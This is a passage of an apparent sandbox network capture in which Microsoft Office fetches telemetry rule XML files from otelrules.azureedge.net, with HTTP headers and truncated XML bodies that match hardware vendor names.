2024-11-14 14:00:47 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.4 | 49807 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:46 UTC | 192 | OUT | GET /rules/rule120611v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:46 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
ETag: "0x8DC582B9F6F3512"
x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140046Z-16547b76f7f22sh5hC1DFWyb4w0000000khg00000000k10b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:47 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.4 | 49808 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:47 UTC | 192 | OUT | GET /rules/rule120612v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:47 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
ETag: "0x8DC582BB10C598B"
x-ms-request-id: b0dd9ec7-701e-0001-4e30-36b110000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140047Z-1749fc9bdbdgs9sshC1DFWt6ws00000002qg00000000babm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:47 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.4 | 49809 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:47 UTC | 192 | OUT | GET /rules/rule120613v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:47 GMT
Content-Type: text/xml
Content-Length: 632
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6E3779E"
x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140047Z-16547b76f7fj897nhC1DFWdwq40000000kn000000000720g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:47 UTC | 632 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.2.4 | 49800 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:47 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:47 GMT
Content-Type: text/xml
Content-Length: 450
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
ETag: "0x8DC582BD4C869AE"
x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140047Z-16547b76f7f76p6chC1DFWctqw0000000kwg000000006cc8
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:47 UTC | 450 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.4 | 49811 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:47 UTC | 192 | OUT | GET /rules/rule120614v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:47 GMT
Content-Type: text/xml
Content-Length: 467
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6C038BC"
x-ms-request-id: 6ba2b82c-f01e-0071-33a3-34431c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140047Z-1749fc9bdbdwv5sghC1DFWwp6n00000002c000000000edz3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:47 UTC | 467 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.2.4 | 49812 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:47 UTC | 192 | OUT | GET /rules/rule120615v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:47 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBAD04B7B"
x-ms-request-id: 933b6e18-c01e-0079-6ca0-34e51a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140047Z-1749fc9bdbdlfqrwhC1DFWmyg800000000gg00000000c82u
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.2.4 | 49814 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:48 UTC | 192 | OUT | GET /rules/rule120617v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:48 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:48 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
ETag: "0x8DC582BA310DA18"
x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140048Z-16547b76f7frbg6bhC1DFWr5400000000kpg00000000804s
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:48 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.2.4 | 49813 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:48 UTC | 192 | OUT | GET /rules/rule120616v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:48 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:48 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB344914B"
x-ms-request-id: 3105e439-501e-0064-36ea-351f54000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140048Z-1749fc9bdbdgs9sshC1DFWt6ws00000002tg000000003cp7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:48 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.4 | 49815 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:48 UTC | 192 | OUT | GET /rules/rule120618v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:48 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:48 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
ETag: "0x8DC582B9018290B"
x-ms-request-id: a5c30855-701e-0050-65a2-346767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140048Z-1749fc9bdbd85qw2hC1DFW157000000002qg00000000b3cm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:48 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.4 | 49817 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:48 UTC | 192 | OUT | GET /rules/rule120620v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:48 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:48 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA701121"
x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140048Z-16547b76f7fkcrm9hC1DFWxdag0000000kt000000000etxk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:48 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.4 | 49818 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:48 UTC | 192 | OUT | GET /rules/rule120619v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:49 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:48 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
ETag: "0x8DC582B9698189B"
x-ms-request-id: ea01f9e5-001e-002b-3081-3599f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140048Z-1749fc9bdbdcm45lhC1DFWeab800000002e000000000be02
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:49 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.4 | 49819 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:49 UTC | 192 | OUT | GET /rules/rule120621v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:49 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:49 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA41997E3"
x-ms-request-id: 59f2508d-401e-00a3-296f-358b09000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140049Z-1749fc9bdbdmg6wshC1DFWu2bc00000002u0000000001xwf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:49 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.2.4 | 49820 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:49 UTC | 192 | OUT | GET /rules/rule120622v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:49 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:49 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8CEAC16"
x-ms-request-id: c860b0c2-d01e-007a-2fa3-34f38c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140049Z-r178fb8d765bflfthC1DFWuy9n00000002s000000000690x
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:49 UTC  477                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   64          192.168.2.4  49821        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
                                                                                                                   2024-11-14 14:00:49 UTC  192                OUT        GET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                   2024-11-14 14:00:49 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 464
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                  ETag: "0x8DC582B97FB6C3C"
                                                                                                                  x-ms-request-id: c5ad635d-201e-00aa-3868-353928000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-r178fb8d765w8fzdhC1DFW8ep400000002f000000000f2f0
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:49 UTC  464                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   65          192.168.2.4  49824        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
                                                                                                                   2024-11-14 14:00:49 UTC  192                OUT        GET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                   2024-11-14 14:00:49 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 494
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                  ETag: "0x8DC582BB7010D66"
                                                                                                                  x-ms-request-id: 835da04b-801e-002a-253f-3631dc000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-1749fc9bdbdns7kfhC1DFWb6c400000002ng00000000cqdc
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:49 UTC  494                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   66          192.168.2.4  49825        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
                                                                                                                   2024-11-14 14:00:49 UTC  192                OUT        GET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                   2024-11-14 14:00:49 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                  ETag: "0x8DC582B9748630E"
                                                                                                                  x-ms-request-id: e9ec46b7-301e-0099-3c15-366683000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140049Z-1749fc9bdbd4dqj6hC1DFWr4n400000002kg00000000dq8c
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:49 UTC  419                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   67          192.168.2.4  49827        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
                                                                                                                   2024-11-14 14:00:49 UTC  192                OUT        GET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                   2024-11-14 14:00:50 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                  ETag: "0x8DC582B9DACDF62"
                                                                                                                  x-ms-request-id: 7dbe6cd5-601e-00ab-1ca2-3466f4000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765kzgrxhC1DFWrsuc00000002hg000000005z04
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:50 UTC  472                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   68          192.168.2.4  49829        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
                                                                                                                   2024-11-14 14:00:50 UTC  192                OUT        GET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                   2024-11-14 14:00:50 UTC  491                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                  ETag: "0x8DC582B9C8E04C8"
                                                                                                                  x-ms-request-id: 06b7c879-901e-00a0-36a3-346a6d000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765w8fzdhC1DFW8ep400000002e000000000fzwm
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:50 UTC  468                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   69          192.168.2.4  49828        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
                                                                                                                   2024-11-14 14:00:50 UTC  192                OUT        GET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                   2024-11-14 14:00:50 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 404
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                  ETag: "0x8DC582B9E8EE0F3"
                                                                                                                  x-ms-request-id: 41a7f78c-b01e-0097-2b78-354f33000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765bflfthC1DFWuy9n00000002n000000000eeug
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                   2024-11-14 14:00:50 UTC  404                IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                   70          192.168.2.4  49832        13.107.246.45   443
                                                                                                                   Timestamp                Bytes transferred  Direction  Data
